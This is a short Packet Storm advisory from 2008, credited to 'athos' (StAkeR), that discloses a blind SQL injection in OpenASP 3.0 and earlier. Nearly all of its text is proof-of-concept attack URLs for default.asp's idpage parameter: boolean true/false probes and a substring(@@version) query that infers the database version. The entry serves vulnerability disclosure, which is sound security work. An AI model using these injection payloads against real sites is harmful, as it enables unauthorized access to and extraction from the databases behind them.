openasp-sql.txt

2008-11-18T00:00:00
ID PACKETSTORM:72020
Type packetstorm
Reporter StAkeR
Modified 2008-11-18T00:00:00

Description

                                        
                                            `/*   
OpenASP <= 3.0 Blind SQL Injection Vulnerability  
-----------------------------------------------------  
by athos - staker[at]hotmail[dot]it   
thanks XaDoS,anyway i've found another sql injection   
http://openasp.it  
-----------------------------------------------------  
  
default.asp?modulo=pages&idpage=1 or 1=1 (true)  
default.asp?modulo=pages&idpage=1 or 1=2 (false)  
default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*  
  
*/  
  
`